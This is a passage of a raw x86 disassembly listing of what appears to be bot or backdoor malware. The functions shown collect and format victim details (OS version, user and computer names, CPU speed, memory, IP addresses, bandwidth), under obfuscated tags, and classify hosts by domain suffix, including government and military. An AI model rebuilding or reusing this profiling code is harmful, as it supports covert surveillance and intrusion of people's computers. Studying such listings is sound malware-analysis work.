xor edx, edx
div ebx
cmp [esp+0Ch+arg_8], 0
jnz short loc_418A8B
test ecx, ecx
ja short loc_418A8B
push eax
push edi
push offset a0_2d0_2d ; "%0.2d:%0.2d"
push esi
call sub_422063
add esp, 10h
jmp short loc_418A9C
; ---------------------------------------------------------------------------
loc_418A8B: ; CODE XREF: sub_418A1B+58�j
; sub_418A1B+5C�j
push eax
push edi
push ecx
push offset aDDayS0_2d0_2d ; "%d day(s) %0.2d:%0.2d"
push esi
call sub_422063
add esp, 14h
loc_418A9C: ; CODE XREF: sub_418A1B+6E�j
mov eax, esi
pop edi
pop esi
pop ebx
retn
sub_418A1B endp
; =============== S U B R O U T I N E =======================================
sub_418AA2 proc near ; CODE XREF: sub_418B58+2EF�p
push ebx
push esi
push edi
mov edi, 0F4240h
loc_418AAA: ; CODE XREF: sub_418AA2+2F�j
; sub_418AA2+35�j
rdtsc
push 3E8h
mov ebx, edx
mov esi, eax
call dword_42F15C ; Sleep
rdtsc
sub eax, esi
push 0
sbb edx, ebx
push edi
push edx
push eax
call sub_424AA0
mov esi, edx
mov ebx, eax
test esi, esi
ja short loc_418AAA
jb short loc_418AD9
cmp ebx, edi
ja short loc_418AAA
loc_418AD9: ; CODE XREF: sub_418AA2+31�j
push 0
push 64h
push esi
push ebx
call sub_424A20
mov ecx, edx
push 64h
xor edx, edx
mov edi, eax
test ecx, ecx
pop eax
ja short loc_418B4C
jb short loc_418AF8
cmp edi, 50h
jnb short loc_418AFD
loc_418AF8: ; CODE XREF: sub_418AA2+4F�j
push 4Bh
xor edx, edx
pop eax
loc_418AFD: ; CODE XREF: sub_418AA2+54�j
test ecx, ecx
ja short loc_418B4C
jb short loc_418B08
cmp edi, 47h
jnb short loc_418B0D
loc_418B08: ; CODE XREF: sub_418AA2+5F�j
push 42h
xor edx, edx
pop eax
loc_418B0D: ; CODE XREF: sub_418AA2+64�j
test ecx, ecx
ja short loc_418B4C
jb short loc_418B18
cmp edi, 37h
jnb short loc_418B1D
loc_418B18: ; CODE XREF: sub_418AA2+6F�j
push 32h
xor edx, edx
pop eax
loc_418B1D: ; CODE XREF: sub_418AA2+74�j
test ecx, ecx
ja short loc_418B4C
jb short loc_418B28
cmp edi, 26h
jnb short loc_418B2D
loc_418B28: ; CODE XREF: sub_418AA2+7F�j
push 21h
xor edx, edx
pop eax
loc_418B2D: ; CODE XREF: sub_418AA2+84�j
test ecx, ecx
ja short loc_418B4C
jb short loc_418B38
cmp edi, 1Eh
jnb short loc_418B3D
loc_418B38: ; CODE XREF: sub_418AA2+8F�j
push 19h
xor edx, edx
pop eax
loc_418B3D: ; CODE XREF: sub_418AA2+94�j
test ecx, ecx
ja short loc_418B4C
jb short loc_418B48
cmp edi, 0Ah
jnb short loc_418B4C
loc_418B48: ; CODE XREF: sub_418AA2+9F�j
xor eax, eax
xor edx, edx
loc_418B4C: ; CODE XREF: sub_418AA2+4D�j
; sub_418AA2+5D�j ...
sub eax, edi
pop edi
sbb edx, ecx
add eax, ebx
adc edx, esi
pop esi
pop ebx
retn
sub_418AA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418B58 proc near ; CODE XREF: sub_403B2C+1CD3�p
var_1590 = byte ptr -1590h
var_590 = byte ptr -590h
var_490 = byte ptr -490h
var_38C = byte ptr -38Ch
var_28C = byte ptr -28Ch
var_200 = byte ptr -200h
var_1B8 = byte ptr -1B8h
var_170 = byte ptr -170h
var_13C = byte ptr -13Ch
var_108 = byte ptr -108h
var_F0 = byte ptr -0F0h
var_E8 = dword ptr -0E8h
var_E4 = dword ptr -0E4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = byte ptr -0BCh
var_3C = byte ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 1590h
call sub_4220C0
push ebx
push esi
lea eax, [ebp+var_D0]
push edi
push eax
mov [ebp+var_4], offset a??? ; "???"
mov [ebp+var_D0], 94h
call dword_42F044 ; GetVersionExA
xor ebx, ebx
cmp [ebp+var_CC], 4
jnz short loc_418BE6
cmp [ebp+var_C8], ebx
jnz short loc_418BC2
cmp [ebp+var_C0], 1
jnz short loc_418BA9
mov [ebp+var_4], offset a95 ; "95"
loc_418BA9: ; CODE XREF: sub_418B58+48�j
cmp [ebp+var_C0], 2
jnz loc_418C74
mov [ebp+var_4], offset aNt ; "NT"
jmp loc_418C45
; ---------------------------------------------------------------------------
loc_418BC2: ; CODE XREF: sub_418B58+3F�j
cmp [ebp+var_C8], 0Ah
jnz short loc_418BD4
mov [ebp+var_4], offset a98 ; "98"
jmp short loc_418C3C
; ---------------------------------------------------------------------------
loc_418BD4: ; CODE XREF: sub_418B58+71�j
cmp [ebp+var_C8], 5Ah
jnz short loc_418C3C
mov [ebp+var_4], offset aMe ; "ME"
jmp short loc_418C3C
; ---------------------------------------------------------------------------
loc_418BE6: ; CODE XREF: sub_418B58+37�j
cmp [ebp+var_CC], 5
jnz short loc_418C24
cmp [ebp+var_C8], ebx
jnz short loc_418C00
mov [ebp+var_4], offset a2k ; "2K"
jmp short loc_418C3C
; ---------------------------------------------------------------------------
loc_418C00: ; CODE XREF: sub_418B58+9D�j
cmp [ebp+var_C8], 1
jnz short loc_418C12
mov [ebp+var_4], offset aXp ; "XP"
jmp short loc_418C3C
; ---------------------------------------------------------------------------
loc_418C12: ; CODE XREF: sub_418B58+AF�j
cmp [ebp+var_C8], 2
jnz short loc_418C3C
mov [ebp+var_4], offset a2k3 ; "2K3"
jmp short loc_418C3C
; ---------------------------------------------------------------------------
loc_418C24: ; CODE XREF: sub_418B58+95�j
cmp [ebp+var_CC], 6
jnz short loc_418C3C
cmp [ebp+var_C8], ebx
jnz short loc_418C3C
mov [ebp+var_4], offset aVista_0 ; "ViSTA"
loc_418C3C: ; CODE XREF: sub_418B58+7A�j
; sub_418B58+83�j ...
cmp [ebp+var_C0], 2
jnz short loc_418C74
loc_418C45: ; CODE XREF: sub_418B58+65�j
cmp [ebp+var_BC], bl
jz short loc_418C74
lea eax, [ebp+var_BC]
push eax
lea eax, [ebp+var_28C]
push [ebp+var_4]
push offset aSS_0 ; "%s %s"
push eax
call sub_422063
lea eax, [ebp+var_28C]
add esp, 10h
mov [ebp+var_4], eax
loc_418C74: ; CODE XREF: sub_418B58+58�j
; sub_418B58+EB�j ...
mov eax, 100h
mov [ebp+var_24], eax
mov [ebp+var_20], eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_590]
push eax
call dword_4541D8 ; GetUserNameA
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_38C]
push eax
call dword_454354 ; GetComputerNameA
lea eax, [ebp+var_490]
push 104h
push eax
call dword_42F110 ; GetSystemDirectoryA
lea eax, [ebp+var_200]
push 46h
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
mov esi, 409h
push ebx
push esi
call dword_42F10C ; GetDateFormatA
lea eax, [ebp+var_1B8]
push 46h
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call dword_42F108 ; GetTimeFormatA
push 20h
lea eax, [ebp+var_F0]
push ebx
push eax
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_F0]
push eax
call dword_42F104 ; GlobalMemoryStatus
mov eax, [ebp+var_E8]
push ebx
shr eax, 0Ah
push eax
call sub_41F537
push eax
lea eax, [ebp+var_13C]
push eax
call sub_422063
mov eax, [ebp+var_E4]
push ebx
shr eax, 0Ah
push eax
call sub_41F537
push eax
lea eax, [ebp+var_170]
push eax
call sub_422063
mov esi, dword_42F0D0
add esp, 20h
mov [ebp+var_18], ebx
mov [ebp+var_14], ebx
push ebx
push ebx
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
call esi ; dword_42F0D0
add eax, 2
push eax
mov [ebp+var_8], eax
call sub_422F79
pop ecx
mov edi, eax
push edi
mov [ebp+var_1C], edi
push [ebp+var_8]
call esi ; dword_42F0D0
mov [ebp+var_8], edi
cmp [edi], bl
jz short loc_418DDB
loc_418D77: ; CODE XREF: sub_418B58+281�j
push offset off_43E640
push [ebp+var_8]
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_418DC6
push 40000000h
lea eax, [ebp+var_108]
push [ebp+var_8]
push eax
call sub_415255
add esp, 0Ch
mov esi, eax
lea edi, [ebp+var_3C]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_34]
mov edi, [ebp+var_1C]
add [ebp+var_18], eax
mov eax, [ebp+var_30]
adc [ebp+var_14], eax
mov eax, [ebp+var_2C]
add [ebp+var_10], eax
mov eax, [ebp+var_28]
adc [ebp+var_C], eax
loc_418DC6: ; CODE XREF: sub_418B58+230�j
mov esi, [ebp+var_8]
push esi
call sub_422120
lea eax, [esi+eax+1]
pop ecx
mov [ebp+var_8], eax
cmp [eax], bl
jnz short loc_418D77
loc_418DDB: ; CODE XREF: sub_418B58+21D�j
push edi
call sub_4230B3
pop ecx
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_14]
push [ebp+var_18]
push 1
push ebx
call dword_42F164 ; GetTickCount
push eax
call sub_418A1B
add esp, 0Ch
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_200]
push eax
lea eax, [ebp+var_590]
push eax
lea eax, [ebp+var_38C]
push eax
lea eax, [ebp+var_490]
push eax
lea eax, [ebp+var_170]
push [ebp+var_C4]
push [ebp+var_C8]
push [ebp+var_CC]
push [ebp+var_4]
push eax
lea eax, [ebp+var_13C]
push eax
call sub_418AA2
push edx
push eax
push offset aFr3nb0ttxid1mn ; "Fr3NB0Ttxid1Mnsrm1FhS.k."
push offset aSCpuI64umhzRam ; "%s (CPU): %I64uMHz, (RAM): %sKB total, "...
lea eax, [ebp+var_1590]
push 1000h
push eax
call sub_42219B
add esp, 58h
cmp [ebp+arg_8], ebx
lea eax, [ebp+var_1590]
pop edi
pop esi
pop ebx
push eax
push [ebp+arg_0]
push [ebp+arg_4]
jnz short loc_418E88
call sub_4104F6
jmp short loc_418E8D
; ---------------------------------------------------------------------------
loc_418E88: ; CODE XREF: sub_418B58+327�j
call sub_410491
loc_418E8D: ; CODE XREF: sub_418B58+32E�j
add esp, 0Ch
leave
retn
sub_418B58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418E92 proc near ; CODE XREF: sub_418F30+A6�p
; sub_418F30+AE�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
lea eax, [ebp+var_4]
xor ebx, ebx
push 1
push eax
push ebx
mov [ebp+var_4], ebx
call dword_4542DC ; GetIfTable
cmp eax, 7Ah
jnz short loc_418EDD
push [ebp+var_4]
call sub_422F79
mov esi, eax
pop ecx
cmp esi, ebx
jz short loc_418EDD
push [ebp+var_4]
push ebx
push esi
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_4]
push 1
push eax
push esi
call dword_4542DC ; GetIfTable
test eax, eax
jz short loc_418EE1
loc_418EDD: ; CODE XREF: sub_418E92+1C�j
; sub_418E92+2B�j
xor eax, eax
jmp short loc_418F1B
; ---------------------------------------------------------------------------
loc_418EE1: ; CODE XREF: sub_418E92+49�j
push edi
mov edi, [esi]
cmp edi, ebx
mov [ebp+var_8], ebx
jbe short loc_418F0F
lea eax, [esi+230h]
loc_418EF1: ; CODE XREF: sub_418E92+7B�j
mov edx, [eax]
cmp edx, ebx
jbe short loc_418F02
mov ecx, [eax+18h]
cmp ecx, ebx
jbe short loc_418F02
cmp edx, ecx
jnz short loc_418F1F
loc_418F02: ; CODE XREF: sub_418E92+63�j
; sub_418E92+6A�j
inc [ebp+var_8]
add eax, 35Ch
cmp [ebp+var_8], edi
jb short loc_418EF1
loc_418F0F: ; CODE XREF: sub_418E92+57�j
xor edi, edi
loc_418F11: ; CODE XREF: sub_418E92+9C�j
push esi
call sub_4230B3
pop ecx
mov eax, edi
pop edi
loc_418F1B: ; CODE XREF: sub_418E92+4D�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_418F1F: ; CODE XREF: sub_418E92+6E�j
cmp [ebp+arg_0], ebx
jz short loc_418F29
mov eax, [eax-4]
jmp short loc_418F2C
; ---------------------------------------------------------------------------
loc_418F29: ; CODE XREF: sub_418E92+90�j
mov eax, [eax+14h]
loc_418F2C: ; CODE XREF: sub_418E92+95�j
mov edi, eax
jmp short loc_418F11
sub_418E92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418F30 proc near ; CODE XREF: sub_403B2C+1DCD�p
var_20F4 = byte ptr -20F4h
var_10F4 = byte ptr -10F4h
var_F4 = byte ptr -0F4h
var_74 = byte ptr -74h
var_40 = byte ptr -40h
var_C = byte ptr -0Ch
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, 20F4h
call sub_4220C0
push ebx
push esi
mov esi, 80h
push edi
xor ebx, ebx
push esi
lea eax, [ebp+var_F4]
push ebx
push eax
call sub_4221F0
add esp, 0Ch
cmp dword_4543FC, ebx
jnz short loc_418FA9
push ebx
lea eax, [ebp+var_F4]
push esi
push eax
lea eax, [ebp+var_4]
push eax
call dword_4541C4 ; InternetGetConnectedStateExA
test eax, eax
jnz short loc_418F8A
lea eax, [ebp+var_F4]
push offset dword_442274
push eax
call sub_422063
pop ecx
pop ecx
loc_418F8A: ; CODE XREF: sub_418F30+45�j
test [ebp+var_4], 1
lea eax, [ebp+var_C]
jz short loc_418FA2
push offset dword_442268
loc_418F98: ; CODE XREF: sub_418F30+77�j
push eax
call sub_422063
pop ecx
pop ecx
jmp short loc_418FC8
; ---------------------------------------------------------------------------
loc_418FA2: ; CODE XREF: sub_418F30+61�j
push offset off_442264
jmp short loc_418F98
; ---------------------------------------------------------------------------
loc_418FA9: ; CODE XREF: sub_418F30+2E�j
mov esi, offset off_442260
lea eax, [ebp+var_C]
push esi
push eax
call sub_422063
lea eax, [ebp+var_F4]
push esi
push eax
call sub_422063
add esp, 10h
loc_418FC8: ; CODE XREF: sub_418F30+70�j
xor esi, esi
xor edi, edi
cmp dword_454414, ebx
jnz short loc_418FE7
push 1
call sub_418E92
push ebx
mov esi, eax
call sub_418E92
pop ecx
mov edi, eax
pop ecx
loc_418FE7: ; CODE XREF: sub_418F30+A2�j
cmp [ebp+arg_C], ebx
push ebx
jz short loc_41900B
shr esi, 14h
push esi
call sub_41F537
push eax
mov esi, offset aSmb ; "%sMB"
lea eax, [ebp+var_40]
push esi
push eax
call sub_422063
shr edi, 14h
jmp short loc_41904A
; ---------------------------------------------------------------------------
loc_41900B: ; CODE XREF: sub_418F30+BB�j
cmp [ebp+arg_10], ebx
jz short loc_41902E
shr esi, 1Eh
push esi
call sub_41F537
push eax
mov esi, offset aSgb ; "%sGB"
lea eax, [ebp+var_40]
push esi
push eax
call sub_422063
shr edi, 1Eh
jmp short loc_41904A
; ---------------------------------------------------------------------------
loc_41902E: ; CODE XREF: sub_418F30+DE�j
shr esi, 0Ah
push esi
call sub_41F537
push eax
mov esi, offset aSkb ; "%sKB"
lea eax, [ebp+var_40]
push esi
push eax
call sub_422063
shr edi, 0Ah
loc_41904A: ; CODE XREF: sub_418F30+D9�j
; sub_418F30+FC�j
push ebx
push edi
call sub_41F537
push eax
lea eax, [ebp+var_74]
push esi
push eax
call sub_422063
add esp, 28h
mov esi, offset dword_455388
push esi
call sub_414173
test eax, eax
pop ecx
mov eax, offset aYes ; "Yes"
jnz short loc_419079
mov eax, offset aNo ; "No"
loc_419079: ; CODE XREF: sub_418F30+142�j
mov edi, offset dword_4552E8
push eax
push edi
push offset dword_4552D0
lea eax, [ebp+var_C]
push esi
push eax
push offset aQnqb5Bavh1_mns ; "qnQb5/bavH1.Mnsrm1FhS.k."
mov esi, 1000h
push offset aSConnectionSIn ; "%s (Connection): %s, (IntIP): %s, (ExtI"...
lea eax, [ebp+var_10F4]
push esi
push eax
call sub_42219B
push edi
call sub_41912B
push eax
lea eax, [ebp+var_20F4]
push offset aCountryS_ ; "(Country): %s. "
push eax
call sub_422063
lea eax, [ebp+var_20F4]
push esi
push eax
lea eax, [ebp+var_10F4]
push eax
call sub_421F40
add esp, 40h
lea eax, [ebp+var_74]
push eax
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_20F4]
push offset aBandwidthDownl ; "(Bandwidth): Downloaded: %s, Uploaded: "...
push eax
call sub_422063
lea eax, [ebp+var_20F4]
push esi
push eax
lea eax, [ebp+var_10F4]
push eax
call sub_421F40
add esp, 1Ch
cmp [ebp+arg_8], ebx
lea eax, [ebp+var_10F4]
pop edi
pop esi
pop ebx
push eax
push [ebp+arg_0]
push [ebp+arg_4]
jnz short loc_419121
call sub_4104F6
jmp short loc_419126
; ---------------------------------------------------------------------------
loc_419121: ; CODE XREF: sub_418F30+1E8�j
call sub_410491
loc_419126: ; CODE XREF: sub_418F30+1EF�j
add esp, 0Ch
leave
retn
sub_418F30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41912B proc near ; CODE XREF: sub_418F30+177�p
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A0h
push esi
lea eax, [ebp+var_A0]
push [ebp+arg_0]
push eax
call dword_42F04C ; lstrcpyA
lea eax, [ebp+var_A0]
push 2Eh
push eax
call sub_4234F0
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz loc_41990A
push offset a_gov ; ".gov"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41917A
mov eax, offset aGovernmentLine ; "Government Line"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_41917A: ; CODE XREF: sub_41912B+43�j
push offset a_net ; ".net"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419195
mov eax, offset aNetworkLine ; "Network Line"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419195: ; CODE XREF: sub_41912B+5E�j
push offset a_info ; ".info"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4191B0
mov eax, offset aInformationalL ; "Informational Line"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4191B0: ; CODE XREF: sub_41912B+79�j
push offset a_org ; ".org"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4191CB
mov eax, offset aOrganisationLi ; "Organisation Line"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4191CB: ; CODE XREF: sub_41912B+94�j
push offset a_com ; ".com"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4191E6
mov eax, offset aCompanyLine ; "Company Line"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4191E6: ; CODE XREF: sub_41912B+AF�j
push offset a_mil ; ".mil"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419201
mov eax, offset aMilitaryLine ; "Military Line"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419201: ; CODE XREF: sub_41912B+CA�j
push offset a_edu ; ".edu"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41921C
mov eax, offset aEducationDept_ ; "Education Dept. Line"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_41921C: ; CODE XREF: sub_41912B+E5�j
push offset dword_4425FC
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419237
mov eax, offset dword_4425EC
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419237: ; CODE XREF: sub_41912B+100�j
push offset off_4425E8
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz loc_41937A
push offset a_ar ; ".ar"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz loc_4193B0
push offset a_at ; ".at"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41927C
mov eax, offset aAustria ; "Austria"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_41927C: ; CODE XREF: sub_41912B+145�j
push offset a_au ; ".au"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419297
mov eax, offset aAustralia ; "Australia"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419297: ; CODE XREF: sub_41912B+160�j
push offset a_be ; ".be"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4192B2
mov eax, offset aBelgium ; "Belgium"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4192B2: ; CODE XREF: sub_41912B+17B�j
push offset a_bg ; ".bg"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4192CD
mov eax, offset aBulgaria ; "Bulgaria"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4192CD: ; CODE XREF: sub_41912B+196�j
push offset a_br ; ".br"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4192E8
mov eax, offset aBrazil ; "Brazil"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4192E8: ; CODE XREF: sub_41912B+1B1�j
push offset a_by ; ".by"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419303
mov eax, offset aBelarus ; "Belarus"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419303: ; CODE XREF: sub_41912B+1CC�j
push offset off_442590
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41931E
mov eax, offset aCanada ; "Canada"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_41931E: ; CODE XREF: sub_41912B+1E7�j
push offset off_44258C
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz loc_4198BD
push offset a_ch ; ".ch"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41934E
mov eax, offset aSwitzerland ; "Switzerland"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_41934E: ; CODE XREF: sub_41912B+217�j
push offset a_cl ; ".cl"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419369
mov eax, offset aChile ; "Chile"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419369: ; CODE XREF: sub_41912B+232�j
push offset a_cn ; ".cn"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419384
loc_41937A: ; CODE XREF: sub_41912B+11B�j
mov eax, offset aChina ; "China"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419384: ; CODE XREF: sub_41912B+24D�j
push offset a_co ; ".co"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41939F
mov eax, offset aCorpLine ; "Corp Line"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_41939F: ; CODE XREF: sub_41912B+268�j
push offset a_cr ; ".cr"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4193BA
loc_4193B0: ; CODE XREF: sub_41912B+130�j
mov eax, offset aUruguay ; "Uruguay"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4193BA: ; CODE XREF: sub_41912B+283�j
push offset a_cx ; ".cx"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz loc_41971F
push offset a_cz ; ".cz"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4193EA
mov eax, offset aCzechRepublic ; "Czech Republic"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4193EA: ; CODE XREF: sub_41912B+2B3�j
push offset a_de ; ".de"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419405
mov eax, offset aGermany ; "Germany"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419405: ; CODE XREF: sub_41912B+2CE�j
push offset a_dk ; ".dk"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419420
mov eax, offset aDenmark ; "Denmark"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419420: ; CODE XREF: sub_41912B+2E9�j
push offset a_ee ; ".ee"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41943B
mov eax, offset aEstonia ; "Estonia"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_41943B: ; CODE XREF: sub_41912B+304�j
push offset a_es ; ".es"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419456
mov eax, offset aSpain ; "Spain"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419456: ; CODE XREF: sub_41912B+31F�j
push offset a_fi ; ".fi"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419471
mov eax, offset aFinland ; "Finland"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419471: ; CODE XREF: sub_41912B+33A�j
push offset a_fj ; ".fj"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41948C
mov eax, offset aFiji ; "FiJi"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_41948C: ; CODE XREF: sub_41912B+355�j
push offset a_fr ; ".fr"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4194A7
mov eax, offset aFrance ; "France"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4194A7: ; CODE XREF: sub_41912B+370�j
push offset a_ge ; ".ge"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4194C2
mov eax, offset aGeorgia ; "Georgia"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4194C2: ; CODE XREF: sub_41912B+38B�j
push offset a_gr ; ".gr"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4194DD
mov eax, offset aGreece ; "Greece"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4194DD: ; CODE XREF: sub_41912B+3A6�j
push offset a_hk ; ".hk"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4194F8
mov eax, offset aHongKong ; "Hong Kong"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4194F8: ; CODE XREF: sub_41912B+3C1�j
push offset a_hu ; ".hu"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419513
mov eax, offset aHungary ; "Hungary"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419513: ; CODE XREF: sub_41912B+3DC�j
push offset a_id ; ".id"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41952E
mov eax, offset aIndonesia ; "Indonesia"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_41952E: ; CODE XREF: sub_41912B+3F7�j
push offset a_ie ; ".ie"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419549
mov eax, offset aIreland ; "Ireland"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419549: ; CODE XREF: sub_41912B+412�j
push offset a_in ; ".in"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419564
mov eax, offset aIndia ; "India"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419564: ; CODE XREF: sub_41912B+42D�j
push offset a_is ; ".is"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41957F
mov eax, offset aIceland ; "Iceland"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_41957F: ; CODE XREF: sub_41912B+448�j
push offset a_il ; ".il"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41959A
mov eax, offset aIsrael ; "Israel"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_41959A: ; CODE XREF: sub_41912B+463�j
push offset a_it ; ".it"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4195B5
mov eax, offset aItaly ; "Italy"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4195B5: ; CODE XREF: sub_41912B+47E�j
push offset a_jp ; ".jp"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz loc_4196E9
push offset a_kg ; ".kg"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4195E5
mov eax, offset aKyrgyzstan ; "Kyrgyzstan"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4195E5: ; CODE XREF: sub_41912B+4AE�j
push offset a_kr ; ".kr"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419600
mov eax, offset aKorea ; "Korea"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419600: ; CODE XREF: sub_41912B+4C9�j
push offset a_kz ; ".kz"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41961B
mov eax, offset aKazakhstan ; "Kazakhstan"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_41961B: ; CODE XREF: sub_41912B+4E4�j
push offset a_lt ; ".lt"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419636
mov eax, offset aLithuania ; "Lithuania"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419636: ; CODE XREF: sub_41912B+4FF�j
